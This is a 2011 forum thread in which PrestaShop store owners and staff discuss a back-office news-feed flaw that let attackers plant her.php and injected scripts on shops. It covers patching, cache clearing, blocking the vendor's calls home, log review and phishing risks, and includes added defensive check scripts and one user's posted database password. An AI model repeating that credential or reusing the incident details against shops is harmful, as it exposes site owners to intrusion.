Andy1 Posted August 25, 2011

My host has kindly fixed this problem for me, but there might still be a problem. Has PrestaShop changed the layout of the Back Office? When I cleared my cache and went to log in I got a message saying 'Invalid Security Token', but I was logged in. The Back Office looks different.

EDIT: It looked different because I was logged into a different account in the BO. Panic over! A huge thanks to my hosting company who have helped sort this out for me.

berta recchia Posted August 25, 2011

> On our site, I had commented out all of the feeds from Prestashop, as they are far too "In your face". Perhaps an idea would be to allow admins to turn this feature off if they do not want it?

I second that. Could this tragedy have been prevented if there was "no link to the mothership"? I tried to hide the ad BO pop-up but it comes back. We know we need add-ons and we know where to go when we are ready for them. This is extremely painful if you are not an expert and have to rely on a very busy site admin that charges top $$. I've gone two days without sales. Some customers have called, some have apparently just gone to the competitor! A suggestion, if I may: please take your time with new releases, test, test, test before pushing a new version. I know it's all about profit and we really DO appreciate your work but PLEASE, take your time.

shacker Posted August 25, 2011

Does 1.4.4.1 have the option to disable the feeds in BO?

psychogav Posted August 25, 2011

Please help. I have loaded up the fix, changed all the passwords, however whenever I log onto my site www.pumpsforafrica.co.za from whichever PC, Avast finds a Trojan which seems to point to a website clickmems.fileave.com. Please will someone help me clear this mess, it is costing me money.

I forgot to add, I am not a computer ace.

Andy1 Posted August 25, 2011

When I open the setting.inc.php the line that has

define('_DB_PASSWD_', '*********');

isn't even showing my old password. Do I need to change this?

Mike Kranzler (Author) Posted August 25, 2011

Hi psychogav, What exactly is the error you're receiving? Can you provide a screenshot? Additionally, please be sure to clear your browser's cache. -Mike

Mike Kranzler (Author) Posted August 25, 2011

Hi Andy, If that line isn't showing your old password, what is it showing exactly? -Mike

ScubaLessonsInc Posted August 25, 2011

I got it to work.. thanks.

Mike Kranzler (Author) Posted August 25, 2011

Hi ScubaLessons, Please check to see if you transferred the correct herfix.php file. If you've downloaded it more than once for one reason or another, the file may be named herfix (2).php or something similar that will prevent you from applying the fix until you rename it as herfix.php. I hope this helps. -Mike

Andy1 Posted August 25, 2011

> Hi Andy, If that line isn't showing your old password, what is it showing exactly? -Mike

Hi Mike, It shows:

define('_DB_PASSWD_', '1gPSs162dp');

That's not my password.

EDIT: I have managed to go into my Cpanel and change the database password by using the password above. However, that password above wasn't set by me.

psychogav Posted August 25, 2011

Hi Mike, I read earlier that I should load up the original Smarty and Smarty V_2 files. Is this correct?

ScubaLessonsInc Posted August 25, 2011

Mike, It was more of a blonde moment LOL.. I actually did not realize it wanted MY site name in there.. I went to http://www.myshop.com/herfix.php and actually wondered why I got an error. Don't I feel dumb. Yes, now you can laugh.. the nerves and fear of being hacked on all my sites and clients' sites not only freaked me out but got the best of my brain.. Up since 3 am checking all my sites. As it turns out all my sites are ok. Just found the one file on toolsupplycenter.com but cleaned it and followed the instructions, no damage done, everything works.

We don't store credit cards or use paypal so I am not too worried about any data they got.. but what about customer data.. did the code request any of that? I read the above and did not see any mention of the customer's data being hacked, but are we absolutely sure that no customer data requests were any part of this code? In other words... Do I need to warn our customers?

I did get it to work on all with the exception of the 3 sites I have where the stores are versions 1.3.6 and 1.5. Any reason why it would not work on those?

Many tanks guys, T

Andy1 Posted August 25, 2011

> Mike, It was more of a blonde moment LOL.. I actually did not realize it wanted MY site name in there..

I don't think you're the only one that made that mistake!

psychogav Posted August 25, 2011

Which cache should I clear?? I have cleared the cache in Smarty and Smarty2. Where else? Sorry, I also have blonde tendencies.

ScubaLessonsInc Posted August 25, 2011

I would like to know is there a way to turn off the prestashop news in the back office and to sever any external connections. If I want to know the news, I get emails from prestashop. That is sufficient. I do not need the open wound in my stores. Please advise any of you experts (Berta) that seem to know all the tricks. I cannot afford to have these sites go down or have any issues. I would love to know just how to get that out permanently.

I would like to second that motion on slowing down the new versions. This is unnecessary.. I don't know of any changes in the newest 1.5 or earlier versions that I could not live without for a few more months. I know the updates are important but perhaps they can be done in "service packs" rather than scary upgrades. Upgrades still feel like new installs and can mess everything up on you. I still have a store I am afraid to upgrade sitting on 1.3.6. because it is getting sales daily I am too cheat to shut it down to tinker with it and take the risk. I am thinking about just doing the store on another site and changing my store link when I get that one working. I was even told when I asked for help they are not supporting the 1.3.6 anymore as it is too dated? HELLO that was FEBRUARY. You would think a developer could stand behind their software for at least a year. Still steaming mad about that one.

In the interim, I would like to weed out any places where the software is not secure.. Calling all coders, where are the scary spots in this software.. put the cards on the table and let's get cracking to close them up! Your help is welcome.

Tanks, Tina

ScubaLessonsInc Posted August 25, 2011

Thanks Andy.. LOL Now that I look back on it it sure feels silly.. I still am very very concerned. There was also talk about a RJ..something trojan that had nothing to do with this her.php hack, that many people were talking about that actually did serious damage to stores on the other thread. Is there a fix for that? Does this take care of it? I just guess I trusted too much in this software. I love that it is so user friendly and flexible and scalable but this just freaks me out big time. Personally I think it is too soon to do any pats on the back yet.

schueco Posted August 25, 2011

Thanks for your very quick fix, good job Prestashop!

psychogav Posted August 25, 2011

Still getting the DAMN VIRUS WARNING.

Mike Kranzler (Author) Posted August 25, 2011

psychogav, Even if your site is completely fixed, it can take a little bit of time for your hosting provider and other external sources to confirm that it's all back up and running. Once the page has been flagged, it takes several crawls confirming that the issue is gone before it removes that warning. I would give it a day or so to finish that, and if you're still having issues after that point please let us know. -Mike

psychogav Posted August 25, 2011

Thank you Mike, I'll wait.

Eolia Posted August 25, 2011

> I would like to know is there a way to turn off the prestashop news in the back office and to sever any external connections. If I want to know the news, I get emails from prestashop. That is sufficient. I do not need the open wound in my stores. Please advise any of you experts (Berta) that seem to know all the tricks. I cannot afford to have these sites go down or have any issues. I would love to know just how to get that out permanently.
>
> I would like to second that motion on slowing down the new versions. This is unnecessary.. I don't know of any changes in the newest 1.5 or earlier versions that I could not live without for a few more months. I know the updates are important but perhaps they can be done in "service packs" rather than scary upgrades. Upgrades still feel like new installs and can mess everything up on you. I still have a store I am afraid to upgrade sitting on 1.3.6. because it is getting sales daily I am too cheat to shut it down to tinker with it and take the risk. I am thinking about just doing the store on another site and changing my store link when I get that one working. I was even told when I asked for help they are not supporting the 1.3.6 anymore as it is too dated? HELLO that was FEBRUARY. You would think a developer could stand behind their software for at least a year. Still steaming mad about that one.
>
> In the interim, I would like to weed out any places where the software is not secure.. Calling all coders, where are the scary spots in this software.. put the cards on the table and let's get cracking to close them up! Your help is welcome.
>
> Tanks, Tina

Suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by

function checkPSVersion() { return false;}

and disable the "theme and mods catalog" tab.

Andy1 Posted August 25, 2011

> Thanks Andy.. LOL Now that I look back on it it sure feels silly..

If it helps, during my panic earlier today, I was looking at the filezilla screen and I went white. There was nothing, no folder, files, etc. I thought 'It's all gone, I have really been screwed over by this'. I went to get a coffee and calm down before returning to the computer and work out what to do next. Upon my return I realised I hadn't clicked the 'connect' button, that's why the screen was blank. I can't use the blonde excuse, as I have brown hair, and not much of it either!

I would echo the idea of slowing down with the release of a new version. I can only talk about the perspective from a complete novice. A month ago I thought CSS was a shop that sold furniture (oh no, that's CSL). When I saw a new version was out, I immediately thought it was essential to download it. Now, for those that know what they are doing, this is easy. For me, this was a massive challenge. If it works then all is well, but if things go wrong, as a novice it can make you think Prestashop is complicated, you need to constantly update it and it can go wrong easily. This isn't true and it would be a shame to lose store users that are new to e-commerce because of this. Slowing down the release will allow new users to get familiar with the current version and understand files such as css, tpl etc. On the other hand, there are those that know what they are doing and have multiple stores. If things go wrong, they have even more to deal with as they have more stores.

The above isn't a moan. I just agree with what's being said, but wanted to add my reason too. But, thanks for letting us all know about the issue and being so efficient at resolving it.

randori Posted August 25, 2011

The fix is not working for me, and I don't have that cache file in smarty map. My site is from the update of June. If I download the newest update and do it, will this fix the virus?

Mike Kranzler (Author) Posted August 25, 2011

Hi Tina, The reason that fix didn't work on your other stores is because the issue exists ONLY in 1.4. We didn't create a fix for any of the other versions of PrestaShop because they weren't affected. You can continue to run those stores as you had been previously. -Mike

merlin-1 Posted August 25, 2011

> I get emails from prestashop. That is sufficient. I do not need the open wound in my stores.

I think this is paramount! It never dawned on me before this, but the idea of your site messing with mine is not at all acceptable. I want the option to break any and all communication between the two. And it's reasonable to expect that.

rassy Posted August 25, 2011

> suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by function checkPSVersion() { return false;} and disable the "theme and mods catalog" tab.

Hi guys, my localhost developing system running on MAMP osx also was hacked. Now this is really strange. HOW could the hacker get my IP Address? I mean: Sure the MAMP system has not been secured, but I only had the Apache server running for a few hours... so my guess is that there must be a central place where all hosted prestashop-ip's are collected. I mean: portscans take ages and my localhost was infected within seconds. So there must be something wrong.

Are you guys sure that the above "call-home" functions are the only places I need to disable in order to prevent my presta-instance from calling home?

Imtec Admin Posted August 25, 2011

> > suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by function checkPSVersion() { return false;} and disable the "theme and mods catalog" tab.
>
> Hi guys, my localhost developing system running on MAMP osx also was hacked. Now this is really strange. HOW could the hacker get my IP Address? I mean: Sure the MAMP system has not been secured, but I only had the Apache server running for a few hours... so my guess is that there must be a central place where all hosted prestashop-ip's are collected. I mean: portscans take ages and my localhost was infected within seconds. So there must be something wrong.
>
> Are you guys sure that the above "call-home" functions are the only places I need to disable in order to prevent my presta-instance from calling home?

I agree with Rassy. My VHost admin can be accessed only from dedicated IPs and my shop was hacked after 10 days (so long has it been active). I'm afraid that his solution is too open, even for open source...

doubleD Posted August 25, 2011

> > suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by function checkPSVersion() { return false;} and disable the "theme and mods catalog" tab.
>
> Hi guys, my localhost developing system running on MAMP osx also was hacked. Now this is really strange. HOW could the hacker get my IP Address? I mean: Sure the MAMP system has not been secured, but I only had the Apache server running for a few hours... so my guess is that there must be a central place where all hosted prestashop-ip's are collected. I mean: portscans take ages and my localhost was infected within seconds. So there must be something wrong.
>
> Are you guys sure that the above "call-home" functions are the only places I need to disable in order to prevent my presta-instance from calling home?

I think it was mentioned before. Your local shop was affected when you logged in to presta's backoffice on local machine.

Tim Dwyer Posted August 25, 2011

I applied the fix at 8.30am this morning but still getting warnings of jokelimo.com being on the front page - I can't see where this ref is although there is a large chunk of JS at the bottom of the page. Please can you assist?

shacker Posted August 25, 2011

You need to replace your footer.tpl with the original and enable the force compile in preferences, performance.

doubleD Posted August 25, 2011

Thanks a lot to Prestashop team and Community for the fix!

Tim Dwyer Posted August 25, 2011

Hi, I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo. Thought it might be {$HOOK_FOOTER} in footer.tpl - but even with that removed it still warns of jokelimo. Any further help?? Thanks

doubleD Posted August 25, 2011

> Hi, I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo. Could it be the {$HOOK_FOOTER} - whatever that may be?? Thanks

Did you enable the force compile in preferences, performance as "shacker" wrote?

Tim Dwyer Posted August 25, 2011

> > Hi, I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo. Could it be the {$HOOK_FOOTER} - whatever that may be?? Thanks
>
> Did you enable the force compile in preferences, performance as "shacker" wrote?

Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK. Thank you for taking the time to check this with me.

doubleD Posted August 25, 2011

> > > Hi, I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo. Could it be the {$HOOK_FOOTER} - whatever that may be?? Thanks
> >
> > Did you enable the force compile in preferences, performance as "shacker" wrote?
>
> Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK. Thank you for taking the time to check this with me.

You're welcome. I suggest you delete all files from "themes/your theme directory/cache/" (except index.php) and "tools/smarty/compile/" (except index.php also). Then you are free to enable presta cache.

shacker Posted August 25, 2011

To clear the cache, you can search the forum for our free module Clear Smarty. It works in Smarty v2 and 3.

keweli Posted August 26, 2011

If your site is of any importance to you, you should really be backing up databases as well as all server files. Funny enough the site that got infected for me was just a catalogue with no customers etc.. The real site with transactions was unharmed but I still applied the fix. I would think that after this problem the Prestashop server will be more secure. For the time being we should trust them to identify/fix any more holes and refrain from modifying/deleting code ourselves if it is of no immediate harm. Give them some time.

lynnetted Posted August 26, 2011

> > > > Hi, I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo. Could it be the {$HOOK_FOOTER} - whatever that may be?? Thanks
> > >
> > > Did you enable the force compile in preferences, performance as "shacker" wrote?
> >
> > Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK. Thank you for taking the time to check this with me.
>
> You're welcome. I suggest you delete all files from "themes/your theme directory/cache/" (except index.php) and "tools/smarty/compile/" (except index.php also). Then you are free to enable presta cache.

Question: Why do you leave the index.php files?

doubleD Posted August 26, 2011

> Question: Why do you leave the index.php files?

To prevent direct access to cache folders (http://yoursite/tools/smarty/compile/) etc...

Tim Dwyer Posted August 26, 2011

> > > > Hi, I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo. Could it be the {$HOOK_FOOTER} - whatever that may be?? Thanks
> > >
> > > Did you enable the force compile in preferences, performance as "shacker" wrote?
> >
> > Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK. Thank you for taking the time to check this with me.
>
> You're welcome. I suggest you delete all files from "themes/your theme directory/cache/" (except index.php) and "tools/smarty/compile/" (except index.php also). Then you are free to enable presta cache.

That is successfully complete - I am pleased to report that there were no rogue files there. Thanks again

sparks777 Posted August 26, 2011

I applied this fix on a local installation (yes, I also have this 'her' file on my local test machine!) (Thanks for the patch!!!)

I compared my folders and files (PS v.1.4.4.0) with a freshly downloaded PS v 1.4.4.1.

I have two questions after applying the fix:

1) in \download\ directory after applying `herfix` I see a new file (.htaccess) - for what?

2) now changed file ajax.php has a difference in line 634 with the original file in PS.v.1.4.4.1 (this change was made by `herfix` because I overwrote this string from PS.v.1.4.4.1 before applying the fix) (!) Which string is OK?? Please see pic (left/1st_below was made by herfix; right/second_below is original from PS.1.4.4.1)

I think that these strings are the same, but when you need to compare files (what changed) this difference wastes time.

lynnetted Posted August 26, 2011

A couple of questions:

1) Starting about two weeks ago, I could not log into our Back Office and see the categories and settings and all the things I expected to see. It was like I had logged into someone else's back office. Making changes in this back office did not affect our website.

2) This didn't occur on every computer or in every browser.

3) I ran the patch, but was unable to change any passwords in the database or the name of the admin folder or user passwords because I am new here and don't have all these permissions/training.

4) NOW when I log into our Back Office using computers and browsers where I was able to login before, I don't see our back office, I see the strange one.

Has anyone else had this experience where they suddenly seemed to be logging into some strange back office, not their own? Does it have any relationship with the security issues? What are the implications of not changing all the passwords and folder names right away?

Thanks! Lynnette

ps - before I ran the security patch, our website had lost a lot of functionality. It's come back now! I'm so happy about that. If I could just log into the back office - all would be complete! Thanks!

lynnetted Posted August 26, 2011

One Other Question: If we disconnect our Back Office from PrestaShop - will we be able to use the 'Automatic Upgrades' in 1.4.4? Thanks again! Lynnette

lynnetted Posted August 26, 2011

Sorry for being bothersome but I thought of another question: There is more than one security flaw listed here - Does this mean PrestaShop is not PCI compliant? Or a shop using PrestaShop cannot become PCI compliant? Thanks!

Asenar Posted August 26, 2011

Hi sparks777,

1) in \download\ directory after applying `herfix` I see a new file (.htaccess) - for what?
>>> Additional security

2) now changed file ajax.php has a difference in line 634 with the original file in PS.v.1.4.4.1 (this change was made by `herfix` because I overwrote this string from PS.v.1.4.4.1 before applying the fix) (!) Which string is OK?? Please see pic (left/1st_below was made by herfix; right/second_below is original from PS.1.4.4.1)
>>> Both are equal.

=========================

lynnetted,

1) Starting about two weeks ago, I could not log into our Back Office and see the categories and settings and all the things I expected to see. It was like I had logged into someone else's back office. Making changes in this back office did not affect our website.
2) This didn't occur on every computer or in every browser.
>>> It seems that is not related to that attack. Maybe a configuration problem related to some cache preferences.

3) I ran the patch, but was unable to change any passwords in the database or the name of the admin folder or user passwords because I am new here and don't have all these permissions/training.
>>> Ask your webmaster or sysadmin/host provider

4) NOW when I log into our Back Office using computers and browsers where I was able to login before, I don't see our back office, I see the strange one.
>>> Can you please send me that by private message, with an access to your back-office?

designguy79 Posted August 26, 2011

> Hi guys, my localhost developing system running on MAMP osx also was hacked. Now this is really strange. HOW could the hacker get my IP Address?

He didn't NEED your IP address -- when you logged in to PrestaShop admin panel, your computer downloaded the infected code from PrestaShop.com

designguy79 Posted August 26, 2011

> This is a very BIG problem. A lot of people use ps distribution for work, and compromise a lot of store only for send text message from PS website is very ******. I'm sorry but I close the prestashop.com website access to all my store - website on my server, next installation of PS I'll check if all work good without the connection to prestashop website. I've used iptables to block all in-out connection to and for prestashop.com under unix using iptables:
>
> iptables -A INPUT -s 213.186.52.66 -j DROP
> iptables -A OUTPUT -d 213.186.52.66 -j DROP

I agree that this is a very serious problem. I definitely think there should be a configuration option to "turn off" any "calls home." The problem with blocking by IP address is that you would have to know all of the IP addresses *.prestashop.com uses, and if they change or add any, you are (potentially) vulnerable again.

jebba Posted August 26, 2011

> How to make sure it doesn't happen again
> Run the herphp.php fix, it patches the AdminHome.php file which had the bug that allows the Prestashop.com site to send files to your server.

I'll note that the AdminHome.php page isn't modified by herfix.php. Nor in the prestashop 1.4.4.1 update is the AdminHome.php file changed. The admin/ajax.php file *is* modified. I'm not certain if there is an oversight in the fix, or whether it is just supposed to change ajax.php.

I should also note that herfix.php reported "OK" when I ran it, but it did *not* update the ajax.php file since it didn't have permissions to do so. A fixed ajax.php should have this sha1sum, afaict:

6ca91f205645bdad957a93ee9bc88c47739ad891

Thanks, -Jeff

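
A way to check what jebba describes, where the fix reports "OK" but admin/ajax.php is unchanged. This is an added example, not part of the thread and not PrestaShop code; the function names are hypothetical, the admin directory path is whatever your install uses, and the default hash is the one quoted in the post above, which jebba gives only as "afaict".

```sh
#!/bin/sh
# Added example: verify by hash that ajax.php was actually replaced,
# instead of trusting the "OK" printed by the fix script.

# SHA-1 quoted in this thread for a fixed ajax.php (stated there as "afaict").
EXPECTED_SHA1="6ca91f205645bdad957a93ee9bc88c47739ad891"

# Print the SHA-1 of a file using whichever tool is installed.
file_sha1() {
    if command -v sha1sum >/dev/null 2>&1; then
        sha1sum "$1" | awk '{print $1}'
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 1 "$1" | awk '{print $1}'
    else
        openssl dgst -sha1 "$1" | awk '{print $NF}'
    fi
}

# check_ajax_patch ADMIN_DIR [EXPECTED_SHA1]
# Prints: missing | patched | unpatched-readonly | unpatched
# Returns 0 only when the hash matches.
check_ajax_patch() {
    admin_dir=$1
    expected=${2:-$EXPECTED_SHA1}
    target="$admin_dir/ajax.php"
    if [ ! -f "$target" ]; then
        echo missing
        return 2
    fi
    actual=$(file_sha1 "$target")
    if [ "$actual" = "$expected" ]; then
        echo patched
        return 0
    fi
    # The writability test reflects the account running this script; run it
    # as the web server account to see what a PHP fix script could write.
    if [ ! -w "$target" ]; then
        echo unpatched-readonly
        return 1
    fi
    echo unpatched
    return 1
}

# Demo on a constructed tree (not a real PrestaShop install).
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/admin"
printf '<?php /* constructed stand-in for ajax.php */\n' > "$demo_dir/admin/ajax.php"
status=$(check_ajax_patch "$demo_dir/admin") || true
echo "constructed file compared with the thread's hash: $status"
rm -rf "$demo_dir"
```
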
marcel_nz Posted August 27, 2011

Patch was not working for me, it did not update ajax.php. I added some debugging output to her.php to see what was going wrong (I'm a PHP developer) and I found there was a version mismatch.

echo "version: "._PS_VERSION_."\n";

gives me "1.4.3" so this line will always fail:

if (_PS_VERSION_ == '1.4.3.0')

so I amended it to:

if (_PS_VERSION_ == '1.4.3.0' || _PS_VERSION_ == '1.4.3')

and that did the trick. Quite possible that I am not the only one with this problem.

dissatisfied Posted August 27, 2011

I posted this in my related thread just a second ago before I noticed the security notice had its own thread going here. So here it goes again:

It is worth noting that this code in admin/ajax.php that I pointed out [was transmitting your email and other shop information to Prestashop.com] was the code responsible for the recent security issues. As I noted before, in addition to sending your email address, shop name, and url to Prestashop.com, this code loads data to be displayed in your back office dashboard. This data was not properly validated, allowing the hackers to inject their own code into each of our servers once they took over the script at Prestashop.com.

Based on this, it is important to note that even for shops that did not have malicious files downloaded to them, the hackers may have the shop email address, along with some other shop information (language, shop name, etc.). Depending on how long the hackers were in control of Prestashop.com's script, they may have a database of thousands or tens of thousands of emails and other data for known-active shops.

The reason this matters (and it seems I need to explain this because nobody as yet has cared that the shop software sends out shop information willy-nilly) is a database like that is perfect for sending targeted, legitimate-looking emails for phishing purposes. The official Prestashop security notice gives no warning of this (or even that the hackers may have your email address even if you weren't visibly hacked. Why? Perhaps it would make it too explicit that their own script has been gathering your data).

Every Prestashop user should be wary of any email coming to their shop address purporting to come from Prestashop.com, their own Prestashop install, or any other source wherein the message references their shop. Follow the usual safety guidelines: never respond to an email requesting any passwords, usernames, or related data; never click a link in an email and "log in" at the resulting page (enter your shop admin url or Prestashop.com into your browser manually instead); and especially be aware of any potentially false "security alerts" instructing you to enter information into any websites or upload files to or otherwise alter your shop install - always double-check those are legitimate by visiting Prestashop.com. These are rules you should be following on a daily basis anyway, but many don't and it may be especially important now.

I hope the Prestashop admins will see fit to include some kind of warning about potential phishing attacks in their security notice.

BWT Posted August 27, 2011

After applying the fix and changing all passwords I still see the warning in the back office. Does this mean I didn't do it right? Also, when I went to my domain/herfix in the browser it showed a 404 error. Is this also normal, or should it have done something else? Please let me know asap, so if it wasn't done right I can try again. Lastly, the herfix.php file, does that stay in the root folder now? Thank you

Eolia Posted August 27, 2011

> After applying the fix and changing all passwords I still see the warning in the back office. Does this mean I didn't do it right? Also, when I went to my domain/herfix in the browser it showed a 404 error. Is this also normal, or should it have done something else? Please let me know asap, so if it wasn't done right I can try again. Lastly, the herfix.php file, does that stay in the root folder now? Thank you

404 error -> Normal: the file herfix.php is destroyed once executed, it has the rights for it. Have you disabled the cache of your store, emptied the directory smarty/compile (except index.php), emptied the cache smarty/cache, emptied the cache themes/yourtheme/cache, emptied the cache of your browser, and reactivated your cache, once the patch was installed?

Big_Berny Posted August 27, 2011

I always get this error when running herfix.php:

    Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/var/www/vhosts/sweetbasel.com/httpdocs/../tabs) is not within the allowed path(s): (/var/www/vhosts/sweetbasel.com/httpdocs:/tmp) in /var/www/vhosts/sweetbasel.com/httpdocs/herfix.php on line 3156
    OK

Any idea why this is happening?

Bewitching Posted August 27, 2011

My concern about this whole mess is that I was NEVER notified about this vulnerability! I have received no email notice whatsoever. If I hadn't come here today looking for info on another matter, I would never have known! I receive all other emails from Prestashop, including "PrestaShop now has over 10,000 fans on Facebook."

I did have the her.php file, but none of the others. I applied the fixes mentioned in the Blog.

I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog?

I guess I feel like I just got kicked in the %*%#@#$ !!!! My heart sank as soon as I read the word hacked/security. Well, hopefully this is the end of this matter.

akboselk Posted August 28, 2011

Hi, I upgraded to PS 1.4.4.1 (from PS 1.4.4.0), so should I still need to run the herfix file on my system? Thanks

Eolia Posted August 28, 2011

> Hi, I upgraded to PS 1.4.4.1 (from PS 1.4.4.0), so should I still need to run the herfix file on my system? Thanks

If you downloaded the latest version, the file ajax.php has been modified. There is no need to apply the patch.

indus Posted August 28, 2011

> My concern about this whole mess is that I was NEVER notified about this vulnerability! I have received no email notice whatsoever. If I hadn't come here today looking for info on another matter, I would never have known! I receive all other emails from Prestashop, including "PrestaShop now has over 10,000 fans on Facebook." I did have the her.php file, but none of the others. I applied the fixes mentioned in the Blog. I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog? I guess I feel like I just got kicked in the %*%#@#$ !!!! My heart sank as soon as I read the word hacked/security. Well, hopefully this is the end of this matter.

Hope you changed all your passwords.

berta recchia Posted August 28, 2011

> My concern about this whole mess is that I was NEVER notified about this vulnerability! I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog?

Nope, you're not alone. I HAD FIRST heard it from a customer complaining about his virus program screaming at him! I didn't look that professional with him of course. Then I looked at my site on Firefox and Chrome and didn't see any problems. Then finally used IE, which showed some parts of the web site in trouble. Then my admin found the hack at the bottom of my pages. I typed part of the hack on Google and found a presta thread..... I'm now paying top $$ to have someone make repairs, fixes.

shacker Posted August 28, 2011

> My concern about this whole mess is that I was NEVER notified about this vulnerability! I have received no email notice whatsoever. If I hadn't come here today looking for info on another matter, I would never have known! I receive all other emails from Prestashop, including "PrestaShop now has over 10,000 fans on Facebook." I did have the her.php file, but none of the others. I applied the fixes mentioned in the Blog. I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog? I guess I feel like I just got kicked in the %*%#@#$ !!!! My heart sank as soon as I read the word hacked/security. Well, hopefully this is the end of this matter.

In the BO is an advice of this issue, and in the page of presta. A newsletter to customers subscribed to the newsletter is now the solution. But putting the announce in the BO is the better option.

designguy79 Posted August 28, 2011

> But putting the announce in the BO is the better option.

Very ironic, in my opinion, since it was a flaw in that very feature of BO that this hack exploited!! Concerned people (such as myself) have turned off communication between our local PrestaShop installs and the "mother ship" (PrestaShop.com). I would recommend others to do the same. I am not going to take a chance that there is additional code that is still vulnerable, and that the hacker(s) have not left back doors on PrestaShop.com's systems.

shacker Posted August 28, 2011

Yes, but don't have a chance to send all emails to all customers (I think that prestashop don't have the email of all store owners), so the best option is this.

Second, all systems can be hacked, and broken. If you don't have access to the news in your BO, but the hackers get access to prestashop.com, replace a stable version in the download section, and a lot of customers download a hacked version of presta, is a similar thing.

The best that we can do is support this system, and don't wait that all comes from the skies without giving nothing. The problem has solved quick, and this is that we want. Solve quick, and responses from the developers. My prestashop is not hacked, because I apply security fixes, and make backups regularly. For all store owners that your store is important, do the same.

merlin-1 Posted August 29, 2011

You guys are blowing this off as "no big deal" way too easy. It's a huge deal! Hackers were able to dump files and change code on every site using prestashop! Simply because you feel we need to have news blasted at us on our back ends. More important than security? On a commerce site??

Someone was able to alter my commerce site <<< That sentence right there is a very big deal!

You got on it fast, and that's great, thank you very much for the prompt fix. But that hole should not have been there. This is not a hobby to most of us. This is business. And as it's been said here by many: We don't need news in our back end. And we should have the option to cut all ties to ANY site that we do not control. To argue that's an unreasonable request is absurd.

I received notice of this breach via email. That is great and enough. And if prestashop isn't going to help cut ties to websites we can not control to avoid this kind of issue, I can see myself, and 100s of thousands of other users, changing software. This is a huge deal, and it needs to be treated as such.

Again, you folks were fantastic in response to it. But the ability to alter my site from another is not acceptable. That needs an option to break it.

kosmolog Posted August 29, 2011

What information could be intercepted by hackers after prestashop infection? Anyone know?

berta recchia Posted August 29, 2011

> Solve quick, and responses from the developers. My prestashop is not hacked, because I apply security fixes, and make backups regularly. For all store owners that your store is important, do the same.

Wrong. Wrong. Is this the official PS statement about this problem? Your quick fix was not quick enough. For all I know the hackers could have downloaded all the emails of my customers. What if they are being scammed using my shop name? We do regular backups and whatever security fix is suggested to us. That didn't prevent my site from being hacked from something WE didn't do.

shacker Posted August 29, 2011

Check your IP access in your host to see if the hackers access to your admin with the bug.

shacker Posted August 29, 2011

And I don't think that hackers can access to 30 000 prestashop stores and downloaded all in only one day.

kosmolog Posted August 29, 2011

> Check your IP access in your host to see if the hackers access to your admin with the bug.

Please, for more information on how to do it?

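One way to do the access-log check suggested above, as an added example that is not from any poster or from PrestaShop. It assumes the host provides logs in the common Apache/Nginx "combined" format; the back-office directory name `admin123`, the IP addresses and the log lines are constructed, and `her.php` is watched because a poster above reports finding that file on an affected shop.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" access-log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def review_access_log(lines, admin_dir, known_admin_ips, watch_files=("her.php",)):
    """Return {ip: [(timestamp, method, path, status), ...]} for requests worth
    a look: successful hits on the back-office directory from an address that
    is not a known administrator, and any request for a file in watch_files."""
    admin_prefix = "/" + admin_dir.strip("/") + "/"
    findings = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, path, status = m["ip"], m["path"], int(m["status"])
        bare_path = path.split("?", 1)[0]          # ignore the query string
        in_admin = bare_path.startswith(admin_prefix)
        watched = bare_path.rsplit("/", 1)[-1] in watch_files
        unknown_admin_hit = (
            in_admin and ip not in known_admin_ips and 200 <= status < 400
        )
        if watched or unknown_admin_hit:
            findings[ip].append((m["ts"], m["method"], path, status))
    return dict(findings)

# Constructed sample log (documentation-range addresses, hypothetical admin dir).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Aug/2011:09:12:01 +0200] "GET /admin123/index.php?tab=AdminHome HTTP/1.1" 200 18234 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Aug/2011:23:40:55 +0200] "GET /admin123/index.php?tab=AdminHome HTTP/1.1" 200 18234 "-" "-"
198.51.100.7 - - [24/Aug/2011:23:41:03 +0200] "GET /her.php HTTP/1.1" 200 77 "-" "-"
203.0.113.5 - - [25/Aug/2011:01:02:03 +0200] "GET /admin123/login.php HTTP/1.1" 404 209 "-" "-"
203.0.113.9 - - [25/Aug/2011:02:00:00 +0200] "GET /product.php?id_product=3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    report = review_access_log(SAMPLE_LOG, "admin123", {"192.0.2.10"})
    for ip, hits in report.items():
        print(ip)
        for ts, method, path, status in hits:
            print(f"  {ts}  {method} {path} -> {status}")
```

Pass the real back-office directory name and the addresses your own administrators connect from; anything the function returns is a lead to investigate, not proof of compromise.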
keweli Posted August 30, 2011

Have any details about the attackers been found?

indus Posted August 30, 2011

I am also interested in knowing this. Is presta team contemplating any legal action on the attackers? Have they been identified?

jebba Posted August 30, 2011

> How to make sure it doesn't happen again
